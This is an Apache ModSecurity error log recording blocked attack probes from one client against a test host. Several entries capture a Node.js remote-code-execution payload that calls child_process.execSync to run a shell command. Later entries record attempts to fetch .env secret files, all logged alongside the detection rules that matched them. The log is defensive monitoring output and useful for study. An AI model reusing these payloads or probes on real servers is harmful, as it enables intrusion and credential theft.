[Tue Feb 03 13:06:12.969466 2026] [:error] [pid 1833927] [client 195.178.110.33:36862] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aYHktBcScgBearvs1jYcigAAAAQ"]
[Tue Feb 03 13:06:12.969958 2026] [:error] [pid 1833927] [client 195.178.110.33:36862] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aYHktBcScgBearvs1jYcigAAAAQ"]
[Tue Feb 03 13:06:12.970141 2026] [:error] [pid 1833927] [client 195.178.110.33:36862] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aYHktBcScgBearvs1jYcigAAAAQ"]
[Tue Feb 03 13:06:15.820098 2026] [:error] [pid 1833925] [client 195.178.110.33:34944] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aYHkt-a85s69zS4gnnji-QAAAAI"]
[Tue Feb 03 13:06:15.820600 2026] [:error] [pid 1833925] [client 195.178.110.33:34944] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aYHkt-a85s69zS4gnnji-QAAAAI"]
[Tue Feb 03 13:06:15.820778 2026] [:error] [pid 1833925] [client 195.178.110.33:34944] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aYHkt-a85s69zS4gnnji-QAAAAI"]
[Tue Feb 03 13:06:20.184200 2026] [:error] [pid 1833925] [client 195.178.110.33:34944] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aYHkvOa85s69zS4gnnji-gAAAAI"]
[Tue Feb 03 13:06:20.184749 2026] [:error] [pid 1833925] [client 195.178.110.33:34944] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aYHkvOa85s69zS4gnnji-gAAAAI"]
[Tue Feb 03 13:06:20.184931 2026] [:error] [pid 1833925] [client 195.178.110.33:34944] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aYHkvOa85s69zS4gnnji-gAAAAI"]
[Tue Feb 03 13:06:28.590881 2026] [:error] [pid 1833926] [client 195.178.110.33:46148] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aYHkxNAEDj_XQhd9DReYHAAAAAM"]
[Tue Feb 03 13:06:28.591417 2026] [:error] [pid 1833926] [client 195.178.110.33:46148] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aYHkxNAEDj_XQhd9DReYHAAAAAM"]
[Tue Feb 03 13:06:28.591598 2026] [:error] [pid 1833926] [client 195.178.110.33:46148] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aYHkxNAEDj_XQhd9DReYHAAAAAM"]
[Tue Feb 03 13:06:42.071665 2026] [:error] [pid 1833937] [client 195.178.110.33:53250] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aYHk0gtpt-Zc3xqkOGfHRgAAAAU"]
[Tue Feb 03 13:06:42.072192 2026] [:error] [pid 1833937] [client 195.178.110.33:53250] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aYHk0gtpt-Zc3xqkOGfHRgAAAAU"]
[Tue Feb 03 13:06:42.072365 2026] [:error] [pid 1833937] [client 195.178.110.33:53250] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aYHk0gtpt-Zc3xqkOGfHRgAAAAU"]
[Tue Feb 03 13:06:53.179405 2026] [:error] [pid 1833999] [client 195.178.110.33:48758] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aYHk3fQ_NRkidvNzMZq4EAAAAAY"]
[Tue Feb 03 13:06:53.179943 2026] [:error] [pid 1833999] [client 195.178.110.33:48758] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aYHk3fQ_NRkidvNzMZq4EAAAAAY"]
[Tue Feb 03 13:06:53.180147 2026] [:error] [pid 1833999] [client 195.178.110.33:48758] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aYHk3fQ_NRkidvNzMZq4EAAAAAY"]
[Tue Feb 03 13:07:02.459147 2026] [:error] [pid 1833925] [client 195.178.110.33:41618] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aYHk5ua85s69zS4gnnji-wAAAAI"]
[Tue Feb 03 13:07:02.459683 2026] [:error] [pid 1833925] [client 195.178.110.33:41618] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aYHk5ua85s69zS4gnnji-wAAAAI"]
[Tue Feb 03 13:07:02.459871 2026] [:error] [pid 1833925] [client 195.178.110.33:41618] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aYHk5ua85s69zS4gnnji-wAAAAI"]
[Tue Feb 03 13:07:02.485242 2026] [:error] [pid 1833925] [client 195.178.110.33:41618] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:param. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:param: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo \\x5c\\x5c'VULN_TEST\\x5c\\x5c'\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aYHk5ua85s69zS4gnnji_AAAAAI"]
[Tue Feb 03 13:07:02.485776 2026] [:error] [pid 1833925] [client 195.178.110.33:41618] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aYHk5ua85s69zS4gnnji_AAAAAI"]
[Tue Feb 03 13:07:02.485962 2026] [:error] [pid 1833925] [client 195.178.110.33:41618] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aYHk5ua85s69zS4gnnji_AAAAAI"]
[Tue Feb 03 13:09:10.281428 2026] [:error] [pid 1833924] [client 195.178.110.33:47218] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aYHlZk7r6RwSjQkPjN4W5AAAAAE"]
[Tue Feb 03 13:09:10.281670 2026] [:error] [pid 1833924] [client 195.178.110.33:47218] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aYHlZk7r6RwSjQkPjN4W5AAAAAE"]
[Tue Feb 03 13:09:10.281853 2026] [:error] [pid 1833924] [client 195.178.110.33:47218] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aYHlZk7r6RwSjQkPjN4W5AAAAAE"]
[Tue Feb 03 13:09:14.907382 2026] [:error] [pid 1833937] [client 195.178.110.33:47918] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aYHlagtpt-Zc3xqkOGfHSAAAAAU"]
[Tue Feb 03 13:09:14.907622 2026] [:error] [pid 1833937] [client 195.178.110.33:47918] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aYHlagtpt-Zc3xqkOGfHSAAAAAU"]
[Tue Feb 03 13:09:14.907805 2026] [:error] [pid 1833937] [client 195.178.110.33:47918] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aYHlagtpt-Zc3xqkOGfHSAAAAAU"]
[Tue Feb 03 13:09:17.516356 2026] [:error] [pid 1833923] [client 195.178.110.33:47934] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aYHlbVdjeLipXl8WaL_BxAAAAAA"]
[Tue Feb 03 13:09:17.516574 2026] [:error] [pid 1833923] [client 195.178.110.33:47934] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aYHlbVdjeLipXl8WaL_BxAAAAAA"]
[Tue Feb 03 13:09:17.516733 2026] [:error] [pid 1833923] [client 195.178.110.33:47934] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aYHlbVdjeLipXl8WaL_BxAAAAAA"]
[Tue Feb 03 13:09:17.611257 2026] [:error] [pid 1833923] [client 195.178.110.33:47934] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aYHlbVdjeLipXl8WaL_BxQAAAAA"]
